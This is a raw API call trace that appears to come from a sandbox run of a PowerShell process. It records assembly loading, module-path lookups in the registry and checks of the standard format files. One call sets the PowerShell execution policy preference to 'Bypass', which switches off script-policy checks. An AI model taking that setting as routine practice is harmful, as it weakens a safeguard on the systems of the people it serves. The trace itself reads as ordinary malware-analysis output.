	[0111.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.685] GetConsoleWindow () returned 0x800aa
	[0136.700] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0137.041] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0137.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.042] CoTaskMemFree (pv=0x27d410) 
	[0137.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.707] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0141.707] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.707] CoTaskMemFree (pv=0x27d410) 
	[0141.708] CoTaskMemAlloc (cb=0xcc) returned 0x1b8498c0
	[0141.708] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8498c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.708] CoTaskMemFree (pv=0x1b8498c0) 
	[0141.709] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdda98 | out: phkResult=0xdda98*=0x1c8) returned 0x0
	[0141.709] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdda1c, lpData=0x0, lpcbData=0xdda18*=0x0 | out: lpType=0xdda1c*=0x2, lpData=0x0, lpcbData=0xdda18*=0x6c) returned 0x0
	[0141.709] CoTaskMemAlloc (cb=0x70) returned 0x2879b0
	[0141.709] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdd9ec, lpData=0x2879b0, lpcbData=0xdd9e8*=0x6c | out: lpType=0xdd9ec*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xdd9e8*=0x6c) returned 0x0
	[0141.709] CoTaskMemFree (pv=0x2879b0) 
	[0141.709] CoTaskMemAlloc (cb=0xcc) returned 0x1b8498c0
	[0141.709] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8498c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.709] CoTaskMemFree (pv=0x1b8498c0) 
	[0141.709] CoTaskMemAlloc (cb=0xcc) returned 0x1b8498c0
	[0141.709] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8498c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.709] CoTaskMemFree (pv=0x1b8498c0) 
	[0141.713] RegCloseKey (hKey=0x1c8) returned 0x0
	[0141.713] CoTaskMemAlloc (cb=0xcc) returned 0x1b8498c0
	[0141.713] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8498c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.713] CoTaskMemFree (pv=0x1b8498c0) 
	[0141.713] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdda98 | out: phkResult=0xdda98*=0x1c8) returned 0x0
	[0141.713] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdda1c, lpData=0x0, lpcbData=0xdda18*=0x0 | out: lpType=0xdda1c*=0x0, lpData=0x0, lpcbData=0xdda18*=0x0) returned 0x2
	[0141.713] RegCloseKey (hKey=0x1c8) returned 0x0
	[0145.943] CoTaskMemAlloc (cb=0x20c) returned 0x1b852b60
	[0145.943] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b852b60 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.549] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0146.551] GetFileType (hFile=0x328) returned 0x1
	[0146.551] SetErrorMode (uMode=0x1) returned 0x1
	[0146.551] GetFileType (hFile=0x328) returned 0x1
	[0146.554] ReadFile (in: hFile=0x328, lpBuffer=0x2e55cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e55cf0*, lpNumberOfBytesRead=0xdd698*=0x1000, lpOverlapped=0x0) returned 1
	[0146.557] ReadFile (in: hFile=0x328, lpBuffer=0x2e55cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e55cf0*, lpNumberOfBytesRead=0xdd698*=0x1000, lpOverlapped=0x0) returned 1
	[0146.557] ReadFile (in: hFile=0x328, lpBuffer=0x2e55cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e55cf0*, lpNumberOfBytesRead=0xdd698*=0x1000, lpOverlapped=0x0) returned 1
	[0146.558] ReadFile (in: hFile=0x328, lpBuffer=0x2e55cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e55cf0*, lpNumberOfBytesRead=0xdd698*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.558] ReadFile (in: hFile=0x328, lpBuffer=0x2e5514b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e5514b*, lpNumberOfBytesRead=0xdd698*=0x0, lpOverlapped=0x0) returned 1
	[0146.558] ReadFile (in: hFile=0x328, lpBuffer=0x2e55cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd698, lpOverlapped=0x0 | out: lpBuffer=0x2e55cf0*, lpNumberOfBytesRead=0xdd698*=0x0, lpOverlapped=0x0) returned 1
	[0146.560] CloseHandle (hObject=0x328) returned 1
	[0148.243] GetSystemInfo (in: lpSystemInfo=0xdc330 | out: lpSystemInfo=0xdc330*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.244] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.486] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.690] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.691] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.692] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.693] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.694] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.695] VirtualQuery (in: lpAddress=0xdc3e0, lpBuffer=0xdd2a0, dwLength=0x30 | out: lpBuffer=0xdd2a0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.179] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0159.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.179] CoTaskMemFree (pv=0x27d410) 
	[0159.625] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd898 | out: phkResult=0xdd898*=0x308) returned 0x0
	[0159.626] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xdd8ac, lpData=0x0, lpcbData=0xdd8a8*=0x0 | out: lpType=0xdd8ac*=0x1, lpData=0x0, lpcbData=0xdd8a8*=0x74) returned 0x0
	[0159.626] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xdd81c, lpData=0x0, lpcbData=0xdd818*=0x0 | out: lpType=0xdd81c*=0x1, lpData=0x0, lpcbData=0xdd818*=0x74) returned 0x0
	[0159.626] CoTaskMemAlloc (cb=0x78) returned 0x2879b0
	[0159.626] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xdd7ec, lpData=0x2879b0, lpcbData=0xdd7e8*=0x74 | out: lpType=0xdd7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xdd7e8*=0x74) returned 0x0
	[0159.626] CoTaskMemFree (pv=0x2879b0) 
	[0159.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0159.626] SetErrorMode (uMode=0x1) returned 0x1
	[0159.626] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0159.856] SetErrorMode (uMode=0x1) returned 0x1
	[0159.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.857] SetErrorMode (uMode=0x1) returned 0x1
	[0159.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0159.929] SetErrorMode (uMode=0x1) returned 0x1
	[0159.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.929] SetErrorMode (uMode=0x1) returned 0x1
	[0159.929] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.929] SetErrorMode (uMode=0x1) returned 0x1
	[0159.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.929] SetErrorMode (uMode=0x1) returned 0x1
	[0159.929] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0159.930] SetErrorMode (uMode=0x1) returned 0x1
	[0159.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
	[0159.931] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
